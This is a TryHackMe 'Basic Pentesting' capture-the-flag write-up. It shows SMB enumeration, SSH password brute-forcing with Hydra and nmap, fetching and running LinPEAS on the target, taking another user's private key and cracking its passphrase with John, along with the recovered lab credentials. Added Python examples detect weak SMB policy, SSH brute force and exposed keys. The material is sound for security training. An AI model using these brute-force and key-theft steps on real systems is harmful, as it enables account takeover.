# Basic Pentesting

**Date:** 09 March 2021

**Author:** Dhilip Sanjay S

***

[Click Here](https://tryhackme.com/room/basicpentestingjt) to go to the TryHackMe room.

## Learning Objectives

* In this set of tasks you'll learn the following:
  * brute forcing (Hydra, Gobuster)
  * hash cracking (John the Ripper)
  * service enumeration (enum4linux)
  * Linux enumeration (LinPEAS)

***

## Solutions

### Find the services exposed by the machine

```bash
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 21:26 IST
Nmap scan report for 10.10.21.87
Host is up (0.17s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.07 seconds
```

***

### What is the name of the hidden directory on the web server?

* **Answer:** development
* **Steps to Reproduce:**

```bash
gobuster dir -u http://10.10.21.87 -t 100 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.21.87
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/03/09 21:33:48 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/development (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2021/03/09 21:33:57 Finished
===============================================================
```

***

### User brute-forcing to find the username & password

1. Running **enum4linux** to enumerate SMB

```bash
enum4linux -a 10.10.21.87
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar  9 22:26:17 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.21.87
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =================================================== 
|    Enumerating Workgroup/Domain on 10.10.21.87    |
 =================================================== 
[+] Got domain/workgroup name: WORKGROUP

 =========================================== 
|    Nbtstat Information for 10.10.21.87    |
 =========================================== 
Looking up status of 10.10.21.87
	BASIC2          <00> -         B <ACTIVE>  Workstation Service
	BASIC2          <03> -         B <ACTIVE>  Messenger Service
	BASIC2          <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ==================================== 
|    Session Check on 10.10.21.87    |
 ==================================== 
[+] Server 10.10.21.87 allows sessions using username '', password ''

 ========================================== 
|    Getting domain SID for 10.10.21.87    |
 ========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Cant determine if host is part of domain or part of a workgroup

 ===================================== 
|    OS information on 10.10.21.87    |
 ===================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.21.87 from smbclient: 
[+] Got OS info for 10.10.21.87 from srvinfo:
	BASIC2         Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

 ============================ 
|    Users on 10.10.21.87    |
 ============================ 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ======================================== 
|    Share Enumeration on 10.10.21.87    |
 ======================================== 

	Sharename       Type      Comment
	---------       ----      -------
	Anonymous       Disk      
	IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.21.87
//10.10.21.87/Anonymous	Mapping: OK, Listing: OK
//10.10.21.87/IPC$	[E] Cant understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 =================================================== 
|    Password Policy Information for 10.10.21.87    |
 =================================================== 


[+] Attaching to 10.10.21.87 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

	[+] BASIC2
	[+] Builtin

[+] Password Info for Domain: BASIC2

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: 37 days 6 hours 21 minutes 
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ============================= 
|    Groups on 10.10.21.87    |
 ============================= 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ====================================================================== 
|    Users on 10.10.21.87 via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-500 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-502 *unknown*\*unknown* (8)
..
S-1-5-21-2853212168-2008227510-3551253869-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
..
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
..
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

 ============================================ 
|    Getting printer info for 10.10.21.87    |
 ============================================ 
No printers returned.

```

* We find two usernames: `jan` and `kay`.
* We'll try to brute-force the password of `jan` first, because the text file in the `/development` directory contains a note from K (kay) saying that J's (jan's) password is easily crackable.
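The enum4linux output above is long, and the settings that matter from a hardening standpoint (a null session accepted, a listable anonymous share, a five-character minimum with complexity off and no lockout threshold, local users leaked through RID cycling) are scattered through it. The following is an added example, not part of the original write-up or of enum4linux, that pulls those weak settings out of enum4linux-style output; the sample text is a constructed excerpt modelled on the lines above, and `min_len=12` is an assumed policy baseline.

```python
import re

# Constructed excerpt modelled on the enum4linux output above (not a full capture).
SAMPLE_ENUM4LINUX = """\
[+] Server 10.10.21.87 allows sessions using username '', password ''
        Anonymous       Disk
        IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
//10.10.21.87/Anonymous    Mapping: OK, Listing: OK
        [+] Minimum password length: 5
        [+] Password Complexity Flags: 000000
        [+] Account Lockout Threshold: None
S-1-22-1-1000 Unix User\\kay (Local User)
S-1-22-1-1001 Unix User\\jan (Local User)
"""

def audit_enum4linux(text, min_len=12):
    """Return (findings, users) from enum4linux-style output.

    findings: short descriptions of weak SMB / password-policy settings;
    users: local Unix accounts exposed through RID cycling (S-1-22-1-*).
    min_len is an assumed baseline for the minimum password length.
    """
    findings, users = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if "allows sessions using username ''" in line:
            findings.append("null session allowed")
        m = re.match(r"//\S+/(\S+)\s+Mapping: OK, Listing: OK$", line)
        if m and m.group(1).upper() != "IPC$":
            findings.append(f"share {m.group(1)} listable without credentials")
        m = re.match(r"\[\+\] Minimum password length: (\d+)$", line)
        if m and int(m.group(1)) < min_len:
            findings.append(f"minimum password length {m.group(1)} < {min_len}")
        if re.match(r"\[\+\] Password Complexity Flags: 0+$", line):
            findings.append("password complexity disabled")
        if line == "[+] Account Lockout Threshold: None":
            findings.append("no account lockout threshold")
        m = re.match(r"S-1-22-1-\d+ Unix User\\(\S+) \(Local User\)$", line)
        if m:
            users.append(m.group(1))
    return findings, users
```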

2. **Hydra:**
   * Using **Hydra** to brute-force the username and password
   * **Example:** `hydra -L users.txt -P passwords.txt ssh://$ip -t 4`
   * Options used and their explanations:
     * `-L` flag: a file containing a list of login names
     * `-l` flag: a single login name
     * `-P` flag: a file containing a list of passwords
     * `ssh://$ip`: our target and protocol
     * `-t` flag: number of parallel tasks to run

```bash
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.21.87 -t 4 | tee hydra.out
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-09 22:14:13
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.21.87:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[STATUS] 28.00 tries/min, 84 tries in 00:03h, 14344315 to do in 8538:17h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active
[STATUS] 28.07 tries/min, 421 tries in 00:15h, 14343978 to do in 8517:49h, 4 active
[22][ssh] host: 10.10.21.87   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-09 22:43:05

```

3. The Nmap NSE script **ssh-brute** was faster than Hydra.

```bash
nmap 10.10.21.87 -p 22 --script ssh-brute --script-args userdb=user.txt,passdb=/usr/share/wordlists/rockyou.txt | tee ssh-brute.out

Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 22:22 IST
NSE: [ssh-brute] Trying username/password pair: jan:jan
..
Nmap scan report for 10.10.21.87
Host is up (0.17s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-brute: 
|   Accounts: 
|     jan:armando - Valid credentials
|_  Statistics: Performed 781 guesses in 636 seconds, average tps: 1.7

Nmap done: 1 IP address (1 host up) scanned in 665.56 seconds

```

4. You can also use `msfconsole` to brute-force the credentials.

* We found jan's password: `armando`.
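Both Hydra and ssh-brute leave a steady stream of failed logins in the target's auth log, which is what a defender watches for. The following is an added example, not part of the original write-up, that flags any source exceeding a threshold of failed SSH logins inside a sliding window and notes whether that source later logged in successfully; the log lines are constructed, not captured from the room, and the threshold and window are assumed.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed auth.log excerpt (not from the room): failures against "jan" from one source, then a success.
SAMPLE_AUTH_LOG = """\
Mar  9 22:14:20 basic2 sshd[1201]: Failed password for jan from 10.10.14.5 port 41022 ssh2
Mar  9 22:14:22 basic2 sshd[1203]: Failed password for jan from 10.10.14.5 port 41024 ssh2
Mar  9 22:14:25 basic2 sshd[1205]: Failed password for invalid user admin from 10.10.14.5 port 41026 ssh2
Mar  9 22:14:27 basic2 sshd[1207]: Failed password for jan from 10.10.14.5 port 41028 ssh2
Mar  9 22:14:29 basic2 sshd[1209]: Failed password for jan from 10.10.14.5 port 41030 ssh2
Mar  9 22:20:05 basic2 sshd[1250]: Failed password for kay from 192.168.56.102 port 51000 ssh2
Mar  9 22:43:04 basic2 sshd[1390]: Accepted password for jan from 10.10.14.5 port 41290 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$")

def detect_ssh_bruteforce(log, threshold=5, window_s=60, year=2021):
    """Return {ip: {...}} for each source with >= threshold failed logins
    in any window_s span; "success" flags a later accepted login from it."""
    failures = defaultdict(list)  # ip -> [(timestamp, user), ...]
    accepted = defaultdict(set)   # ip -> users with a successful login
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        if m["result"] == "Failed":
            failures[m["ip"]].append((ts, m["user"]))
        else:
            accepted[m["ip"]].add(m["user"])
    alerts = {}
    for ip, events in failures.items():
        events.sort()
        start = 0  # left edge of the sliding window over sorted timestamps
        for end in range(len(events)):
            while events[end][0] - events[start][0] > timedelta(seconds=window_s):
                start += 1
            if end - start + 1 >= threshold:
                users = sorted({u for _, u in events})
                alerts[ip] = {"failures": len(events), "users": users,
                              "success": bool(accepted[ip] & set(users))}
                break
    return alerts
```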

***

### What is the username?

* **Answer:** jan

***

### What is the password?

* **Answer:** armando

***

### What service do you use to access the server (answer in abbreviation in all caps)?

* **Answer:** SSH

***

### Enumerate the machine to find any vectors for privilege escalation

* There is a password backup file in kay's home directory, `pass.bak`, but we have no read permission on it.
* So we'll run `linpeas.sh` to find possible privilege escalation vectors.
* `wget` linpeas.sh into any folder where you have write permission.

```bash
jan@basic2:$ ./linpeas.sh
...
[+] Searching ssl/ssh files
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
Possible private SSH keys were found!
/home/kay/.ssh/id_rsa
 --> /etc/hosts.allow file found, read the rules:
/etc/hosts.allow
...

jan@basic2:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
.
.
.
-----END RSA PRIVATE KEY-----

```

* After running it, we find that **Kay's SSH private key (id\_rsa)** is readable by us.
* Copy the contents of the id\_rsa file (the private key) and store it on your local machine.
* Try to log in using the private key.
  * `ssh -i` flag: specifies the identity file.

```bash
root@kali: ssh -i kay_id_rsa kay@10.10.21.87
Enter passphrase for key 'kay_id_rsa': 

```

* It's asking for the key's passphrase, which we don't have yet.

***

### What is the name of the other user you found (all lower case)?

* **Answer:** kay

***

### If you have found another user, what can you do with this information?

* **Answer:** We can try to escalate our privileges to gain **root access**. Maybe that user has additional permissions which can be exploited to gain root access.

***

### What is the final password you obtain?

* **Answer:** heresareallystrongpasswordthatfollowsthepasswordpolicy$$
* **Steps to Reproduce:**
* Now, we'll try to brute-force the SSH passphrase using `john`.
* Convert the id\_rsa file using `ssh2john.py` so that it can be fed to John for **brute-forcing the passphrase**.

```bash
root@kali: /usr/share/john/ssh2john.py kay_id_rsa > forjohn.txt
root@kali: john forjohn.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (kay_id_rsa)
Session completed

```

* Log in using the SSH private key and provide the passphrase.

```bash
root@kali: ssh -i kay_id_rsa kay@10.10.21.87
Enter passphrase for key 'kay_id_rsa': 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

```
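Two things made kay's key usable here: the file was readable by another user, and it was a legacy PEM key whose passphrase KDF is a single MD5 iteration (john's `Cost 1 ... 0` and `Cost 2 ... 1` lines above), so a dictionary passphrase falls quickly. The following is an added example, not part of the original write-up or of LinPEAS, that audits a directory tree for private keys readable by group or other and reports which format each uses; the sample tree it builds holds placeholder files, not real key material.

```python
import os
import tempfile

OPENSSH_HDR = "-----BEGIN OPENSSH PRIVATE KEY-----"

def classify_key(text):
    """Classify a private key by its header; a legacy PEM with 'Proc-Type:
    4,ENCRYPTED' was encrypted with OpenSSL's one-iteration MD5 KDF."""
    if text.startswith(OPENSSH_HDR):
        return "openssh-format (bcrypt KDF when passphrase-protected)"
    first = text.split("\n", 1)[0]
    if first.startswith("-----BEGIN ") and first.endswith(" PRIVATE KEY-----"):
        if "Proc-Type: 4,ENCRYPTED" in text:
            return "legacy PEM, encrypted (MD5 KDF, 1 iteration)"
        return "legacy PEM, unencrypted"
    return None

def audit_private_keys(root):
    """Walk root; report private keys whose mode lets group or other read them."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, errors="ignore") as fh:
                    head = fh.read(512)
            except OSError:
                continue
            kind = classify_key(head)
            if kind is None:
                continue
            mode = os.stat(path).st_mode & 0o777
            if mode & 0o077:  # any group/other permission bit set
                findings.append((path, oct(mode), kind))
    return findings

def make_demo_tree():
    """Constructed sample: a 0644 encrypted legacy key (kay's case) and a 0600 OpenSSH key."""
    root = tempfile.mkdtemp()
    ssh_dir = os.path.join(root, "kay", ".ssh")
    os.makedirs(ssh_dir)
    weak, good = os.path.join(ssh_dir, "id_rsa"), os.path.join(ssh_dir, "id_ed25519")
    with open(weak, "w") as fh:  # placeholder body, not real key material
        fh.write("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                 "DEK-Info: AES-128-CBC,00\n<placeholder>\n-----END RSA PRIVATE KEY-----\n")
    with open(good, "w") as fh:
        fh.write(OPENSSH_HDR + "\n<placeholder>\n-----END OPENSSH PRIVATE KEY-----\n")
    os.chmod(weak, 0o644)
    os.chmod(good, 0o600)
    return root
```

The same check is worth running on a real host as root over `/home` and `/root`, since a mode of `0644` on a key is what let jan read kay's `id_rsa`.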

***

## References

* [Hydra Cheatsheet](https://github.com/frizb/Hydra-Cheatsheet)
* [Privilege escalation scripts](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/)
* [Linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
* [Null Byte Article - Crack SSH private key passwords using John the Ripper](https://null-byte.wonderhowto.com/how-to/crack-ssh-private-key-passwords-with-john-ripper-0302810/)
  * Sometimes we can get the **private key (id\_rsa)** through a variety of scenarios, like if we had read access due to **LFI or even command injection** allowing us to execute certain commands.

***
